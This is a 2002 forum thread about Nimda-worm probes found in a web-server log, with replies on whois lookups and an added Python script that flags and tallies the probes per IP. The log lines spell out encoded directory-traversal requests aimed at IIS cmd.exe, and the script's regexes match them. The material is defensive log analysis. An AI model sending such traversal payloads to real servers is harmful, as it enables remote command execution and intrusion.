
Is there a way to track IP addys that fail an nslookup?


illovich
03-18-2002, 03:26 PM
Hey all,

I've had some troubling connections from a single domain (155.230.x.x), actually it was a bit ago, but I just noticed all the 404s in my logs. It seems to me like a scriptkiddie was trying to break into my WindowsNT server. Luckily, I was running OS X on it ;) .

Here's a sample:
155.230.14.11 - - [26/Feb/2002:03:00:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311

I'm assuming that this individual was checking to see if my webserver was vulnerable to some msxploit...apparently one that would give them access to my C: drive (joke's on them...for a few separate reasons, as we know).

Anyway, actually 2 questions. One, I would like to report the individual in question to their ISP (I'm assuming from the pattern of connections that they were dialed in via PPP)...but the reverse lookup failed, so I don't know how to go further in trying to track down the sysadmin.

Secondly, is there a way to deny access to this domain? Is that even worth bothering with?

Thanks,

ill.
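An added example (not from the original poster) of what a log-watcher for this burst looks like: it parses Apache common-log lines, flags requests that combine an encoded "../" traversal with the /winnt/system32/cmd.exe target, and tallies them per source IP so you have a count and a first-seen time to put in the abuse report. The sample log below is constructed from the lines in the post plus one benign request; the regexes and function names are the example's own.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: three probes from the burst above plus one ordinary request.
SAMPLE_LOG = """\
155.230.14.11 - - [26/Feb/2002:03:00:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
192.0.2.7 - - [26/Feb/2002:03:01:00 -0500] "GET /index.html HTTP/1.0" 200 1432
"""

# Apache common log format: ip ident user [timestamp] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
# ".." followed by some percent-encoded bytes (overlong UTF-8, double-encoded, or
# malformed) and then "../": the encoded traversal seen in every probe line.
TRAVERSAL_RE = re.compile(r"\.\.%[^/]*\.\./")
TARGET_RE = re.compile(r"/winnt/system32/cmd\.exe", re.IGNORECASE)


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not common log format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_traversal_probe(path):
    """True when the request path is an encoded-traversal attempt aimed at cmd.exe."""
    return bool(TRAVERSAL_RE.search(path) and TARGET_RE.search(path))


def summarize(log_text):
    """Per-IP probe count, status breakdown and first-seen timestamp for probing hosts."""
    report = defaultdict(lambda: {"probes": 0, "statuses": Counter(), "first": None})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_traversal_probe(rec["path"]):
            continue
        entry = report[rec["ip"]]
        entry["probes"] += 1
        entry["statuses"][rec["status"]] += 1   # 404/400 here: the target is not IIS
        entry["first"] = entry["first"] or rec["ts"]
    return dict(report)


if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {info['probes']} probes since {info['first']}, "
              f"statuses {dict(info['statuses'])}")
```

Feed it the real access log instead of SAMPLE_LOG and the per-IP summary is what goes to the netblock contact; the 404/400 statuses also show the probes found nothing to hit.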

Cadre
03-18-2002, 08:58 PM
The easiest way to get the owner of the IP address is to lookup the netblock owner of the IP. There is a wonderful site: Geektool's Whois Proxy (http://www.geektools.com/cgi-bin/proxy.cgi). Just copy/paste the IP into their proxy and hit the whois button and it will spit back the information.

Looks like the IP 155.230.14.11 is owned by Kyungpook National University. The contact email address listed is: staff@bh.knu.ac.kr

illovich
03-19-2002, 07:27 AM
Cool, thanks for the tip.

BTW, to anybody who didn't recognize the burst above: a very nice system admin told me that that burst of requests is the Nimda virus, out there in netland poking around.

And here I thought it was a scriptkiddy.
:)